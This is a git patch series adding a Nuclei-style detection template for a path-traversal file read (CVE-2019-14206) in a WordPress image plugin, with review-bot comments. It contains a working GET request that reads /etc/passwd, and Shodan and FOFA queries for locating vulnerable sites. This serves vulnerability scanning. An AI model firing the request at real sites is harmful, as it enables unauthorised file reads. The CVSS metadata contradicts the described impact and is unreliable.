From a6dd44f7b8a148449128dd51cba877f78198bf8d Mon Sep 17 00:00:00 2001 From: guilhermemour2018-art Date: Sun, 4 Jan 2026 01:49:16 -0300 Subject: [PATCH 1/2] Add files via upload --- CVE-2019-14206.yaml | 57 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 CVE-2019-14206.yaml
diff --git a/CVE-2019-14206.yaml b/CVE-2019-14206.yaml
new file mode 100644
index 000000000000..f17cad88b7bb
--- /dev/null
+++ b/CVE-2019-14206.yaml
@@ -0,0 +1,57 @@
+id: CVE-2019-14206
+
+info:
+ name: WordPress Nevma Adaptive Images <0.6.67 - Arbitrary File Deletion / LFI
+ author: cascade
+ severity: high
+ description: |
+ The WordPress Nevma Adaptive Images plugin before 0.6.67 contains unsafe handling of user input in adaptive-images-script.php, enabling arbitrary file deletion and file read. An attacker can control the path used by the cache mechanism and read sensitive files (e.g., /etc/passwd) or delete arbitrary files.
+ impact: |
+ Successful exploitation can read sensitive files or delete arbitrary files accessible to the web server user, leading to information disclosure, denial of service, or further compromise.
+ remediation: |
+ Update the plugin to version 0.6.67 or later where input sanitization was added.
+ reference:
+ - https://markgruffer.github.io/2019/07/19/adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.html
+ - https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-14206
+ - https://wpscan.com/vulnerability/7beaa002-880e-4f94-9f6d-61a8497b9019
+ classification:
+ cve-id: CVE-2019-14206
+ cwe-id: CWE-22
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
+ cvss-score: 9.1
+ epss-score: 0.04139
+ epss-percentile: 0.91415
+ cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:*
+ metadata:
+ max-request: 1
+ vendor: nevma
+ product: adaptive_images
+ framework: wordpress
+ shodan-query: 'title:"WordPress" "Adaptive Images"'
+ fofa-query: 'body="adaptive-images-settings" && body="adaptive-images-script.php"'
+ verified: true
+ tags: cve,cve2019,wordpress,wp-plugin,filedeletion,arbitrary-file-deletion,lfi,wp
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=/etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "root:x:0:0:root"
+ - "/bin"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - image/jpeg
+
+ - type: status
+ status:
+ - 200
From 8858e13a0d12942ee2dfb0f2186ef3b96353df2d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 5 Jan 2026 10:35:59 +0530 Subject: [PATCH 2/2] Update and rename CVE-2019-14206.yaml to http/cves/2019/CVE-2019-14206.yaml --- .../cves/2019/CVE-2019-14206.yaml | 28 ++++--------------- 1 file changed, 6 insertions(+), 22 deletions(-) rename CVE-2019-14206.yaml => http/cves/2019/CVE-2019-14206.yaml (70%)
diff --git a/CVE-2019-14206.yaml b/http/cves/2019/CVE-2019-14206.yaml
similarity index 70%
rename from CVE-2019-14206.yaml
rename to http/cves/2019/CVE-2019-14206.yaml
index f17cad88b7bb..a8c1d91e16f8 100644
--- a/CVE-2019-14206.yaml
+++ b/http/cves/2019/CVE-2019-14206.yaml
@@ -14,7 +14,6 @@ info:
 - https://markgruffer.github.io/2019/07/19/adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.html
 - https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown
 - https://nvd.nist.gov/vuln/detail/CVE-2019-14206
- - https://wpscan.com/vulnerability/7beaa002-880e-4f94-9f6d-61a8497b9019
 classification:
 cve-id: CVE-2019-14206
 cwe-id: CWE-22
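Review bot: The classification block contradicts the rest of the template: `cvss-metrics` carries `C:N`, i.e. no confidentiality impact, while `name`, `description` and the body matcher are all built around reading /etc/passwd. Either the vector and the 9.1 score should match the NVD record that the reference list points to, or the description should be scoped to what the vector actually covers; as written a triager cannot tell which of the two is authoritative. The follow-up patch in this series leaves this block untouched, so the inconsistency survives into http/cves/2019/CVE-2019-14206.yaml.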
@@ -25,33 +24,18 @@ info:
 cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:*
 metadata:
 max-request: 1
- vendor: nevma
- product: adaptive_images
- framework: wordpress
- shodan-query: 'title:"WordPress" "Adaptive Images"'
- fofa-query: 'body="adaptive-images-settings" && body="adaptive-images-script.php"'
 verified: true
- tags: cve,cve2019,wordpress,wp-plugin,filedeletion,arbitrary-file-deletion,lfi,wp
+ tags: cve,cve2019,wordpress,wp-plugin,lfi,wp,adaptive-images
 
 http:
 - method: GET
 path:
 - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=/etc/passwd"
 
- matchers-condition: and
 matchers:
- - type: word
- part: body
- words:
- - "root:x:0:0:root"
- - "/bin"
+ - type: dsl
+ dsl:
+ - "regex('root:.*:0:0:', body)"
+ - 'contains(body, "adaptive-images")'
+ - "status_code == 200"
 condition: and
-
- - type: word
- part: header
- words:
- - image/jpeg
-
- - type: status
- status:
- - 200
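Review bot: The new dsl matcher makes `contains(body, "adaptive-images")` a hard requirement next to the passwd regex, but a successful read returns the target file's contents, in which that string does not occur; it would presumably only appear through something like a PHP notice echoing the script path, so the AND condition is likely to drop true positives on hosts that suppress error output while adding no evidence that the read itself happened. A check on the leaked content, such as `- "contains(body, '/bin')"` carried over from the word matcher this hunk removes, would serve the false-positive goal better. Separately, `root:.*:0:0:` is looser than the old literal `root:x:0:0:root` because `.*` may span any text between `root:` and a later `:0:0:`; `- "regex('root:[^:]*:0:0:', body)"` pins it to a single entry.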